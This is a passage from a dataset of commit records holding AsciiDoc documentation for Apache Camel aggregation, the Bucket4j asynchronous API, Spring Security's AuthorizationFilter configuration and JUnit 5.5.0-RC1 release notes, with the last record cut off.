\n=== Using a controller to force the aggregator to complete\n\nThe `org.apache.camel.processor.aggregate.AggregateController` allows\nyou to control the aggregator at runtime using the Java or JMX API. This can\nbe used to force completing groups of exchanges, or to query its current\nruntime statistics.\n\nThe aggregator provides a default implementation if no custom one has been\nconfigured, which can be accessed using the `getAggregateController()` method.\nThough it may be easier to configure a controller in the route using\n`aggregateController` as shown below:\n\n[source,java]\n----\nprivate AggregateController controller = new DefaultAggregateController();\n\nfrom(\"direct:start\")\n .aggregate(header(\"id\"), new MyAggregationStrategy())\n .completionSize(10).id(\"myAggregator\")\n .aggregateController(controller)\n .to(\"mock:aggregated\");\n----\n\nThen there is an API on `AggregateController` to force completion. For\nexample, to complete a group with the key foo:\n\n[source,java]\n----\nint groups = controller.forceCompletionOfGroup(\"foo\");\n----\n\nThe returned value is the number of groups completed.\nA value of 1 is returned if the foo group existed, otherwise 0 is returned.\n\nThere is also a method to complete all groups:\n\n[source,java]\n----\nint groups = controller.forceCompletionOfAllGroups();\n----\n\nThe controller can also be used in the XML DSL using `aggregateControllerRef` to\nrefer to a bean with the controller implementation, which is looked up in the registry.\n\nWhen using Spring XML you can create the bean with `<bean>` as shown:\n\n[source,xml]\n----\n<bean id=\"myController\" class=\"org.apache.camel.processor.aggregate.DefaultAggregateController\"\/>\n \n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:start\"\/>\n <aggregate strategyRef=\"myAppender\" completionSize=\"10\"\n aggregateControllerRef=\"myController\">\n <correlationExpression>\n <header>id<\/header>\n <\/correlationExpression>\n <to uri=\"mock:result\"\/>\n <\/aggregate>\n <\/route>\n<\/camelContext>\n----\n\nThere is also a JMX API on the aggregator, which is available under the processors node in the Camel JMX tree.\n\n== Aggregating with Beans\n\nNormally, to use an `AggregationStrategy` you have to implement the\n`org.apache.camel.AggregationStrategy` interface,\nwhich means your logic is tied to the Camel API.\nInstead, you can use a bean for the logic and let Camel adapt to your\nbean. To use a bean, a convention must be followed:\n\n* there must be a public method to use\n* the method must not be void\n* the method can be static or non-static\n* the method must have 2 or more parameters\n* the parameters are paired, so the first half is applied to the\n`oldExchange`, and the remaining half is for the `newExchange`.\n Therefore, there must be an equal number of parameters, e.g. 2, 4, 6, etc.\n\nThe paired parameters are expected to be ordered as follows:\n\n* the first parameter is the message body\n* optional, the 2nd parameter is a `Map` of the headers\n* optional, the 3rd parameter is a `Map` of the exchange properties\n\nThis convention is best explained with some examples.\n\nIn the method below, we have only 2 parameters, so the 1st parameter is\nthe body of the `oldExchange`, and the 2nd is paired to the body of the\n`newExchange`:\n\n[source,java]\n----\npublic String append(String existing, String next) {\n return existing + next;\n}\n----\n\nIn the method below, we have 4 parameters, so the 1st parameter is\nthe body of the `oldExchange`, the 2nd is the `Map` of the\n`oldExchange` headers, the 3rd is paired to the body of the `newExchange`,\nand the 4th parameter is the `Map` of the `newExchange` headers:\n\n[source,java]\n----\npublic String append(String existing, Map existingHeaders, String next, Map nextHeaders) {\n return existing + next;\n}\n----\n\nAnd finally, if we have 6 parameters, that includes the exchange properties as well:\n\n[source,java]\n----\npublic String append(String existing, Map existingHeaders, Map existingProperties,\n String next, Map nextHeaders, Map nextProperties) {\n return existing + next;\n}\n----\n\nTo use this with the aggregate EIP we can use a bean with the aggregate logic as follows:\n\n[source,java]\n----\npublic class MyBodyAppender {\n\n public String append(String existing, String next) {\n return next + existing;\n }\n\n}\n----\n\nAnd then in the Camel route we create an instance of our bean, and refer to it in
the route using the `bean` method from\n`org.apache.camel.builder.AggregationStrategies` as shown:\n\n[source,java]\n----\nprivate MyBodyAppender appender = new MyBodyAppender();\n\npublic void configure() throws Exception {\n from(\"direct:start\")\n .aggregate(constant(true), AggregationStrategies.bean(appender, \"append\"))\n .completionSize(3)\n .to(\"mock:result\");\n}\n----\n\nWe can also provide the bean class type directly:\n\n[source,java]\n----\npublic void configure() throws Exception {\n from(\"direct:start\")\n .aggregate(constant(true), AggregationStrategies.bean(MyBodyAppender.class, \"append\"))\n .completionSize(3)\n .to(\"mock:result\");\n}\n----\n\nAnd if the bean has only one method, we do not need to specify the name\nof the method:\n\n[source,java]\n----\npublic void configure() throws Exception {\n from(\"direct:start\")\n .aggregate(constant(true), AggregationStrategies.bean(MyBodyAppender.class))\n .completionSize(3)\n .to(\"mock:result\");\n}\n----\n\nAnd the `append` method could be static:\n\n[source,java]\n----\npublic class MyBodyAppender {\n\n public static String append(String existing, String next) {\n return next + existing;\n }\n\n}\n----\n\nIf you are using the XML DSL then you need to declare a `<bean>` for the bean:\n\n[source,xml]\n----\n<bean id=\"myAppender\" class=\"com.foo.MyBodyAppender\"\/>\n----\n\nAnd in the Camel route we use `strategyRef` to refer to the bean by its\nid, and `strategyMethodName` can be used to define the method name\nto call:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:start\"\/>\n <aggregate strategyRef=\"myAppender\" strategyMethodName=\"append\" completionSize=\"3\">\n <correlationExpression>\n <constant>true<\/constant>\n <\/correlationExpression>\n <to uri=\"mock:result\"\/>\n <\/aggregate>\n <\/route>\n<\/camelContext>\n----\n\nWhen using the XML DSL you can also specify the bean class directly in `strategyRef`\nusing the `#class:` syntax as shown:\n\n[source,xml]\n----\n<route>\n <from uri=\"direct:start\"\/>\n <aggregate strategyRef=\"#class:com.foo.MyBodyAppender\" strategyMethodName=\"append\" completionSize=\"3\">\n <correlationExpression>\n <constant>true<\/constant>\n <\/correlationExpression>\n <to uri=\"mock:result\"\/>\n <\/aggregate>\n<\/route>\n----\n\nYou can use this form of the XML DSL when you are not using the classic Spring XML files,\nand use XML only for the Camel routes.
\n\n=== Aggregating when no data\n\nWhen using a bean as the `AggregationStrategy`, the method is\n*only* invoked when there is data to be aggregated, meaning that the message body\nis not `null`. In cases where you want the method invoked even when there is no data (the message body is `null`),\nset `strategyMethodAllowNull` to `true`.\n\nWhen using beans this can be configured a bit easier using the `beanAllowNull` method\nfrom `AggregationStrategies` as shown:\n\n[source,java]\n----\npublic void configure() throws Exception {\n from(\"direct:start\")\n .pollEnrich(\"seda:foo\", 1000, AggregationStrategies.beanAllowNull(appender, \"append\"))\n .to(\"mock:result\");\n}\n----\n\nThen the `append` method in the bean would need to deal with the\nsituation that `newExchange` can be `null`:\n\n[source,java]\n----\npublic class MyBodyAppender {\n\n public String append(String existing, String next) {\n if (next == null) {\n return \"NewWasNull\" + existing;\n } else {\n return existing + next;\n }\n }\n\n}\n----\n\nIn the example above we use the xref:content-enricher.adoc[Content Enricher]\nEIP using `pollEnrich`. The `newExchange` will be `null` in the\nsituation where we could not get any data from the \"seda:foo\" endpoint, and\na timeout was hit after 1 second.\n\nSo if we need to do special merge logic, we need to allow `null`, as done above with\n`beanAllowNull` (or `strategyMethodAllowNull` in the XML DSL).\nIf we don't do this, then on timeout the `append` method would not be\ninvoked, meaning the xref:content-enricher.adoc[Content Enricher] did\nnot merge\/change the message.\n\nIn the XML DSL you would configure the `strategyMethodAllowNull` option and\nset it to `true` as shown below:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:start\"\/>\n <aggregate strategyRef=\"myAppender\"\n strategyMethodName=\"append\"\n strategyMethodAllowNull=\"true\"\n completionSize=\"3\">\n <correlationExpression>\n <constant>true<\/constant>\n <\/correlationExpression>\n <to uri=\"mock:result\"\/>\n <\/aggregate>\n <\/route>\n<\/camelContext>\n----\n\n=== Aggregating with different body types\n\nWhen for example using `strategyMethodAllowNull` as `true`, the\nparameter types of the message bodies do not have to be the same. For\nexample, suppose we want to aggregate from a `com.foo.User` type to a\n`List<String>` that contains the user's name.
We could code a bean as follows:\n\n[source,java]\n----\npublic final class MyUserAppender {\n\n public List addUsers(List names, User user) {\n if (names == null) {\n names = new ArrayList();\n }\n names.add(user.getName());\n return names;\n }\n}\n----\n\nNotice that the return type is a `List`, which we want to contain the names of the users.\nThe 1st parameter is the `List` of names, and the 2nd parameter is the incoming `com.foo.User` type.\n","old_contents":"
","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d27977d21d902f8141fd71a254cb38ecc9c7474f","subject":"asynchronous.adoc","message":"asynchronous.adoc\n","repos":"vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j","old_file":"asciidoc\/src\/main\/docs\/asciidoc\/distributed\/asynchronous.adoc","new_file":"asciidoc\/src\/main\/docs\/asciidoc\/distributed\/asynchronous.adoc","new_contents":"=== Asynchronous API\nSince version ``3.0`` Bucket4j provides asynchronous analogs for the majority of API methods.\nAn async view of a proxyManager is available through the ``asAsync()`` method:\n[source, java]\n----\nProxyManager proxyManager = ...;\nAsyncProxyManager asyncProxyManager = proxyManager.asAsync();\n\nBucketConfiguration configuration = ...;\nAsyncBucketProxy asyncBucket = asyncProxyManager.builder().build(key, configuration);\n----\nEach method of the ```AsyncBucketProxy``` class has a full equivalent with the same semantics in the synchronous ```Bucket``` class.
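\n\nFor example, a single token could be consumed asynchronously as follows; a minimal sketch, where the key and the callback logic are illustrative:\n[source, java]\n----\nAsyncBucketProxy bucket = asyncProxyManager.builder().build(\"user-42\", configuration);\nCompletableFuture<Boolean> consumed = bucket.tryConsume(1);\nconsumed.thenAccept(ok -> {\n if (ok) {\n \/\/ a token was acquired, proceed with the work\n } else {\n \/\/ rate limit exceeded, reject or retry later\n }\n});\n----\n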
\n==== Example - limiting the rate of access to the asynchronous servlet\nImagine that you develop an SMS service, which allows sending SMS via an HTTP interface.\nYou want your architecture to be protected from overloading, clustered, and fully asynchronous.\n\n**Overloading protection requirement:**\n\n> To prevent fraud and service overloading you want to introduce the following limit for any outbound phone number: The bucket size is 20 SMS (which cannot be exceeded at any given time), with a \"refill rate\" of 10 SMS per minute that continually increases tokens in the bucket.\nIn other words, if a client sends 10 SMS per minute, it will never be throttled,\nand moreover, the client has an overdraft equal to 20 SMS, which can be used if the average is a little bit higher than 10 SMS\/minute over a short time period.\n\n**Solution:** let's use bucket4j for this.\n\n**Clustering requirement:**\n\n> You want to avoid a single point of failure: if one server crashes, the information about consumed tokens should not be lost;\nthus it would be better to use a distributed computation platform for storing the buckets.\n\n**Solution:** let's use JBoss Infinispan for this via the ``bucket4j-infinispan`` extension.\nHazelcast and Apache Ignite would also be good choices; Infinispan is just selected as an example.\n\n**Asynchronous processing requirement:**\nAlso, for maximum scalability, you want the architecture to be fully non-blocking;\na non-blocking architecture means that both SMS sending and limit checking should be asynchronous.\n\n**Solution:** let's use the asynchronous features provided by bucket4j and the Servlet API.\n\n**Mockup of service based on top of Servlet API and bucket4j-infinispan**:\n[source, java]\n----\npublic class SmsServlet extends javax.servlet.http.HttpServlet {\n\n private SmsSender smsSender;\n private AsyncProxyManager<String> buckets;\n private Supplier<BucketConfiguration> configuration;\n \n @Override\n public void init(ServletConfig config) throws ServletException {\n super.init(config);\n ServletContext ctx = config.getServletContext();\n \n smsSender = (SmsSender) ctx.getAttribute(\"sms-sender\");\n \n FunctionalMapImpl<String, byte[]> bucketMap = (FunctionalMapImpl<String, byte[]>) ctx.getAttribute(\"bucket-map\");\n this.buckets = new InfinispanProxyManager(bucketMap).asAsync();\n \n this.configuration = () -> {\n long overdraft = 20;\n Refill refill = Refill.greedy(10, Duration.ofMinutes(1));\n Bandwidth limit = Bandwidth.classic(overdraft, refill);\n return BucketConfiguration.builder()\n .addLimit(limit)\n .build();\n };\n }\n \n @Override\n protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws IOException, ServletException {\n String fromNumber = req.getParameter(\"from\");\n String toNumber = req.getParameter(\"to\");\n String text = req.getParameter(\"text\");\n \n AsyncBucketProxy bucket = buckets.builder().build(fromNumber, configuration);\n CompletableFuture<ConsumptionProbe> limitCheckingFuture = bucket.tryConsumeAndReturnRemaining(1);\n final AsyncContext asyncContext = req.startAsync();\n limitCheckingFuture.thenCompose(probe -> {\n if (!probe.isConsumed()) {\n Result throttledResult = Result.throttled(probe);\n return CompletableFuture.completedFuture(throttledResult);\n } else {\n CompletableFuture<Result> sendingFuture = smsSender.sendAsync(fromNumber, toNumber, text);\n return sendingFuture;\n }\n }).whenComplete((result, exception) -> {\n HttpServletResponse asyncResponse = (HttpServletResponse) asyncContext.getResponse();\n try {\n asyncResponse.setContentType(\"text\/plain\");\n if (exception != null || result.isFailed()) {\n asyncResponse.setStatus(500);\n asyncResponse.getWriter().println(\"Internal Error\");\n } else if (result.isThrottled()) {\n asyncResponse.setStatus(429);\n asyncResponse.setHeader(\"X-Rate-Limit-Retry-After-Seconds\", \"\" + result.getRetryAfter());\n asyncResponse.getWriter().append(\"Too many requests\");\n } else {\n asyncResponse.setStatus(200);\n asyncResponse.getWriter().append(\"Success\");\n }\n } finally {\n asyncContext.complete();\n }\n });\n }\n\n}\n----\n","old_contents":"
","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"11a74a292602efb2d3ca13e492b5dcfb8476ba60","subject":"Fix method call example on documentation","message":"Fix method call example on documentation","repos":"spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security","old_file":"docs\/modules\/ROOT\/pages\/servlet\/authorization\/authorize-http-requests.adoc","new_file":"docs\/modules\/ROOT\/pages\/servlet\/authorization\/authorize-http-requests.adoc","new_contents":"[[servlet-authorization-authorizationfilter]]\n= Authorize HttpServletRequests with AuthorizationFilter\n:figures: servlet\/authorization\n\nThis section builds on xref:servlet\/architecture.adoc#servlet-architecture[Servlet Architecture and Implementation] by digging deeper into how xref:servlet\/authorization\/index.adoc#servlet-authorization[authorization] works within Servlet-based applications.\n\n[NOTE]\n`AuthorizationFilter` supersedes xref:servlet\/authorization\/authorize-requests.adoc#servlet-authorization-filtersecurityinterceptor[`FilterSecurityInterceptor`].\nTo remain backward compatible, `FilterSecurityInterceptor` remains the default.\nThis section discusses how `AuthorizationFilter` works and how to override the default configuration.\n\nThe {security-api-url}org\/springframework\/security\/web\/access\/intercept\/AuthorizationFilter.html[`AuthorizationFilter`] provides xref:servlet\/authorization\/index.adoc#servlet-authorization[authorization] for ``HttpServletRequest``s.\nIt is inserted into the xref:servlet\/architecture.adoc#servlet-filterchainproxy[FilterChainProxy] as one of the xref:servlet\/architecture.adoc#servlet-security-filters[Security Filters].\n\nYou can override the default when you declare a `SecurityFilterChain`.\nInstead of using xref:servlet\/authorization\/authorize-http-requests.adoc#servlet-authorize-requests-defaults[`authorizeRequests`], use `authorizeHttpRequests`, like so:\n\n.Use authorizeHttpRequests\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws AuthenticationException {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .anyRequest().authenticated()\n );\n \/\/ ...\n\n return http.build();\n}\n----\n====\n\nThis improves on `authorizeRequests` in a number of ways:\n\n1. Uses the simplified `AuthorizationManager` API instead of metadata sources, config attributes, decision managers, and voters.\nThis simplifies reuse and customization.\n2. Delays `Authentication` lookup.\nInstead of the authentication needing to be looked up for every request, it will only look it up in requests where an authorization decision requires authentication.\n3. Bean-based configuration support.
\n\nWhen `authorizeHttpRequests` is used instead of `authorizeRequests`, then {security-api-url}org\/springframework\/security\/web\/access\/intercept\/AuthorizationFilter.html[`AuthorizationFilter`] is used instead of xref:servlet\/authorization\/authorize-requests.adoc#servlet-authorization-filtersecurityinterceptor[`FilterSecurityInterceptor`].\n\n.Authorize HttpServletRequest\nimage::{figures}\/authorizationfilter.png[]\n\n* image:{icondir}\/number_1.png[] First, the `AuthorizationFilter` obtains an xref:servlet\/authentication\/architecture.adoc#servlet-authentication-authentication[Authentication] from the xref:servlet\/authentication\/architecture.adoc#servlet-authentication-securitycontextholder[SecurityContextHolder].\nIt wraps this in a `Supplier` in order to delay the lookup.\n* image:{icondir}\/number_2.png[] Second, `AuthorizationFilter` creates a {security-api-url}org\/springframework\/security\/web\/FilterInvocation.html[`FilterInvocation`] from the `HttpServletRequest`, `HttpServletResponse`, and `FilterChain`.\n\/\/ FIXME: link to FilterInvocation\n* image:{icondir}\/number_3.png[] Next, it passes the `Supplier<Authentication>` and `FilterInvocation` to the xref:servlet\/architecture.adoc#authz-authorization-manager[`AuthorizationManager`].\n** image:{icondir}\/number_4.png[] If authorization is denied, an `AccessDeniedException` is thrown.\nIn this case the xref:servlet\/architecture.adoc#servlet-exceptiontranslationfilter[`ExceptionTranslationFilter`] handles the `AccessDeniedException`.\n** image:{icondir}\/number_5.png[] If access is granted, `AuthorizationFilter` continues with the xref:servlet\/architecture.adoc#servlet-filters-review[FilterChain] which allows the application to process normally.\n\nWe can configure Spring Security to have different rules by adding more rules in order of precedence.\n\n.Authorize Requests\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n\thttp\n\t\t\/\/ ...\n\t\t.authorizeHttpRequests(authorize -> authorize \/\/ <1>\n\t\t\t.mvcMatchers(\"\/resources\/**\", \"\/signup\", \"\/about\").permitAll() \/\/ <2>\n\t\t\t.mvcMatchers(\"\/admin\/**\").hasRole(\"ADMIN\") \/\/ <3>\n\t\t\t.mvcMatchers(\"\/db\/**\").access(new WebExpressionAuthorizationManager(\"hasRole('ADMIN') and hasRole('DBA')\")) \/\/ <4>\n\t\t\t.anyRequest().denyAll() \/\/ <5>\n\t\t);\n\n\treturn http.build();\n}\n----\n====\n<1> There are multiple authorization rules specified.\nEach rule is considered in the order it is declared.\n<2> We specified multiple URL patterns that any user can access.\nSpecifically, any user can access a request if the URL starts with \"\/resources\/\", equals \"\/signup\", or equals \"\/about\".\n<3> Any URL that starts with \"\/admin\/\" will be restricted to users who have the role \"ROLE_ADMIN\".\nYou will notice that since we are invoking the `hasRole` method we do not need to specify the \"ROLE_\" prefix.\n<4> Any URL that starts with \"\/db\/\" requires the user to have both \"ROLE_ADMIN\" and \"ROLE_DBA\".\nYou will notice that since we are using the `hasRole` expression we do not need to specify the \"ROLE_\" prefix.\n<5> Any URL that has not already been matched is denied access.\nThis is a good strategy if you do not want to accidentally forget to update your authorization rules.
\nYou can take a bean-based approach by constructing your own xref:servlet\/authorization\/architecture.adoc#authz-delegate-authorization-manager[`RequestMatcherDelegatingAuthorizationManager`] like so:\n\n.Configure RequestMatcherDelegatingAuthorizationManager\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http, AuthorizationManager<RequestAuthorizationContext> access)\n throws AuthenticationException {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .anyRequest().access(access)\n );\n \/\/ ...\n\n return http.build();\n}\n\n@Bean\nAuthorizationManager<RequestAuthorizationContext> requestMatcherAuthorizationManager(HandlerMappingIntrospector introspector) {\n RequestMatcher permitAll =\n new AndRequestMatcher(\n new MvcRequestMatcher(introspector, \"\/resources\/**\"),\n new MvcRequestMatcher(introspector, \"\/signup\"),\n new MvcRequestMatcher(introspector, \"\/about\"));\n RequestMatcher admin = new MvcRequestMatcher(introspector, \"\/admin\/**\");\n RequestMatcher db = new MvcRequestMatcher(introspector, \"\/db\/**\");\n RequestMatcher any = AnyRequestMatcher.INSTANCE;\n AuthorizationManager<HttpServletRequest> manager = RequestMatcherDelegatingAuthorizationManager.builder()\n .add(permitAll, (context) -> new AuthorizationDecision(true))\n .add(admin, AuthorityAuthorizationManager.hasRole(\"ADMIN\"))\n .add(db, AuthorityAuthorizationManager.hasRole(\"DBA\"))\n .add(any, new AuthenticatedAuthorizationManager())\n .build();\n return (authentication, context) -> manager.check(authentication, context.getRequest());\n}\n----\n====\n\nYou can also wire xref:servlet\/authorization\/architecture.adoc#authz-custom-authorization-manager[your own custom authorization managers] for any request matcher.\n\nHere is an example of mapping a custom authorization manager to the `my\/authorized\/endpoint`:\n\n.Custom Authorization Manager\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .mvcMatchers(\"\/my\/authorized\/endpoint\").access(new CustomAuthorizationManager())\n );\n \/\/ ...\n\n return http.build();\n}\n----\n====
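\n\nThe `CustomAuthorizationManager` referenced above is not defined by the text; a minimal hypothetical implementation, shown here only to illustrate the `AuthorizationManager` contract, might look like:\n\n[source,java]\n----\npublic class CustomAuthorizationManager implements AuthorizationManager<RequestAuthorizationContext> {\n\n @Override\n public AuthorizationDecision check(Supplier<Authentication> authentication,\n RequestAuthorizationContext context) {\n \/\/ illustrative rule: grant access only when a (hypothetical) header is present\n boolean granted = context.getRequest().getHeader(\"X-Allowed\") != null;\n return new AuthorizationDecision(granted);\n }\n}\n----\n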
\nOr you can provide it for all requests as seen below:\n\n.Custom Authorization Manager for All Requests\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .anyRequest().access(new CustomAuthorizationManager())\n );\n \/\/ ...\n\n return http.build();\n}\n----\n====\n\nBy default, the `AuthorizationFilter` applies to all dispatcher types.\nWe can configure Spring Security to not apply the authorization rules to all dispatcher types by using the `shouldFilterAllDispatcherTypes` method:\n\n.Set shouldFilterAllDispatcherTypes to false\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .shouldFilterAllDispatcherTypes(false)\n .anyRequest().authenticated()\n );\n \/\/ ...\n\n return http.build();\n}\n----\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@Bean\nopen fun web(http: HttpSecurity): SecurityFilterChain {\n http {\n authorizeHttpRequests {\n shouldFilterAllDispatcherTypes = false\n authorize(anyRequest, authenticated)\n }\n }\n return http.build()\n}\n----\n====\n","old_contents":"
Bean-based configuration support.\n\nWhen `authorizeHttpRequests` is used instead of `authorizeRequests`, then {security-api-url}org\/springframework\/security\/web\/access\/intercept\/AuthorizationFilter.html[`AuthorizationFilter`] is used instead of xref:servlet\/authorization\/authorize-requests.adoc#servlet-authorization-filtersecurityinterceptor[`FilterSecurityInterceptor`].\n\n.Authorize HttpServletRequest\nimage::{figures}\/authorizationfilter.png[]\n\n* image:{icondir}\/number_1.png[] First, the `AuthorizationFilter` obtains an xref:servlet\/authentication\/architecture.adoc#servlet-authentication-authentication[Authentication] from the xref:servlet\/authentication\/architecture.adoc#servlet-authentication-securitycontextholder[SecurityContextHolder].\nIt wraps this in an `Supplier` in order to delay lookup.\n* image:{icondir}\/number_2.png[] Second, `AuthorizationFilter` creates a {security-api-url}org\/springframework\/security\/web\/FilterInvocation.html[`FilterInvocation`] from the `HttpServletRequest`, `HttpServletResponse`, and `FilterChain`.\n\/\/ FIXME: link to FilterInvocation\n* image:{icondir}\/number_3.png[] Next, it passes the `Supplier<Authentication>` and `FilterInvocation` to the xref:servlet\/architecture.adoc#authz-authorization-manager[`AuthorizationManager`].\n** image:{icondir}\/number_4.png[] If authorization is denied, an `AccessDeniedException` is thrown.\nIn this case the xref:servlet\/architecture.adoc#servlet-exceptiontranslationfilter[`ExceptionTranslationFilter`] handles the `AccessDeniedException`.\n** image:{icondir}\/number_5.png[] If access is granted, `AuthorizationFilter` continues with the xref:servlet\/architecture.adoc#servlet-filters-review[FilterChain] which allows the application to process normally.\n\nWe can configure Spring Security to have different rules by adding more rules in order of precedence.\n\n.Authorize Requests\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n\thttp\n\t\t\/\/ ...\n\t\t.authorizeHttpRequests(authorize -> authorize \/\/ <1>\n\t\t\t.mvcMatchers(\"\/resources\/**\", \"\/signup\", \"\/about\").permitAll() \/\/ <2>\n\t\t\t.mvcMatchers(\"\/admin\/**\").hasRole(\"ADMIN\") \/\/ <3>\n\t\t\t.mvcMatchers(\"\/db\/**\").access(new WebExpressionAuthorizationManager(\"hasRole('ADMIN') and hasRole('DBA')\")) \/\/ <4>\n\t\t\t.anyRequest().denyAll() \/\/ <5>\n\t\t);\n\n\treturn http.build();\n}\n----\n====\n<1> There are multiple authorization rules specified.\nEach rule is considered in the order they were declared.\n<2> We specified multiple URL patterns that any user can access.\nSpecifically, any user can access a request if the URL starts with \"\/resources\/\", equals \"\/signup\", or equals \"\/about\".\n<3> Any URL that starts with \"\/admin\/\" will be restricted to users who have the role \"ROLE_ADMIN\".\nYou will notice that since we are invoking the `hasRole` method we do not need to specify the \"ROLE_\" prefix.\n<4> Any URL that starts with \"\/db\/\" requires the user to have both \"ROLE_ADMIN\" and \"ROLE_DBA\".\nYou will notice that since we are using the `hasRole` expression we do not need to specify the \"ROLE_\" prefix.\n<5> Any URL that has not already been matched on is denied access.\nThis is a good strategy if you do not want to accidentally forget to update your authorization rules.\n\nYou can take a bean-based approach by constructing your own 
xref:servlet\/authorization\/architecture.adoc#authz-delegate-authorization-manager[`RequestMatcherDelegatingAuthorizationManager`] like so:\n\n.Configure RequestMatcherDelegatingAuthorizationManager\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http, AuthorizationManager<RequestAuthorizationContext> access)\n throws AuthenticationException {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .anyRequest().access(access)\n )\n \/\/ ...\n\n return http.build();\n}\n\n@Bean\nAuthorizationManager<RequestAuthorizationContext> requestMatcherAuthorizationManager(HandlerMappingIntrospector introspector) {\n RequestMatcher permitAll =\n new AndRequestMatcher(\n new MvcRequestMatcher(introspector, \"\/resources\/**\"),\n new MvcRequestMatcher(introspector, \"\/signup\"),\n new MvcRequestMatcher(introspector, \"\/about\"));\n RequestMatcher admin = new MvcRequestMatcher(introspector, \"\/admin\/**\");\n RequestMatcher db = new MvcRequestMatcher(introspector, \"\/db\/**\");\n RequestMatcher any = AnyRequestMatcher.INSTANCE;\n AuthorizationManager<HttpRequestServlet> manager = RequestMatcherDelegatingAuthorizationManager.builder()\n .add(permitAll, (context) -> new AuthorizationDecision(true))\n .add(admin, AuthorityAuthorizationManager.hasRole(\"ADMIN\"))\n .add(db, AuthorityAuthorizationManager.hasRole(\"DBA\"))\n .add(any, new AuthenticatedAuthorizationManager())\n .build();\n return (context) -> manager.check(context.getRequest());\n}\n----\n====\n\nYou can also wire xref:servlet\/authorization\/architecture.adoc#authz-custom-authorization-manager[your own custom authorization managers] for any request matcher.\n\nHere is an example of mapping a custom authorization manager to the `my\/authorized\/endpoint`:\n\n.Custom Authorization Manager\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .mvcMatchers(\"\/my\/authorized\/endpoint\").access(new CustomAuthorizationManager());\n )\n \/\/ ...\n\n return http.build();\n}\n----\n====\n\nOr you can provide it for all requests as seen below:\n\n.Custom Authorization Manager for All Requests\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .anyRequest.access(new CustomAuthorizationManager());\n )\n \/\/ ...\n\n return http.build();\n}\n----\n====\n\nBy default, the `AuthorizationFilter` applies to all dispatcher types.\nWe can configure Spring Security to not apply the authorization rules to all dispatcher types by using the `shouldFilterAllDispatcherTypes` method:\n\n.Set shouldFilterAllDispatcherTypes to false\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .shouldFilterAllDispatcherTypes(false)\n .anyRequest.authenticated()\n )\n \/\/ ...\n\n return http.build();\n}\n----\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@Bean\nopen fun web(http: HttpSecurity): SecurityFilterChain {\n http {\n authorizeHttpRequests {\n shouldFilterAllDispatcherTypes = false\n authorize(anyRequest, authenticated)\n }\n }\n return http.build()\n}\n----\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"709bc53c7dc92c7a7196cf3c88e0018a4fbdf1e8","subject":"Document #1850 in release 
notes","message":"Document #1850 in release notes\n","repos":"sbrannen\/junit-lambda,junit-team\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-5.5.0-RC1.adoc","new_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-5.5.0-RC1.adoc","new_contents":"[[release-notes-5.5.0-RC1]]\n== 5.5.0-RC1\n\n*Date of Release:* \u2753\n\n*Scope:* \u2753\n\nFor a complete list of all _closed_ issues and pull requests for this release, consult the\nlink:{junit5-repo}+\/milestone\/37?closed=1+[5.5 RC1] milestone page in the JUnit repository\non GitHub.\n\n\n[[release-notes-5.5.0-RC1-junit-platform]]\n=== JUnit Platform\n\n==== Bug Fixes\n\n* A custom `ClassLoader` created for additional `--class-path` entries passed to the\n `ConsoleLauncher` will now be closed after usage to gracefully free file handles.\n\n==== Deprecations and Breaking Changes\n\n* The internal `PreconditionViolationException` class in concealed package\n `org.junit.platform.commons.util` is now deprecated and has been replaced by an\n exception class with the same name in exported package `org.junit.platform.commons`.\n\n==== New Features and Improvements\n\n* `AnnotationSupport.findRepeatableAnnotations()` now finds repeatable annotations used as\n meta-annotations on other repeatable annotations.\n* New `AnnotationSupport.findRepeatableAnnotations()` variant that accepts a\n `java.util.Optional<? extends AnnotatedElement>` argument.\n* Exceptions thrown 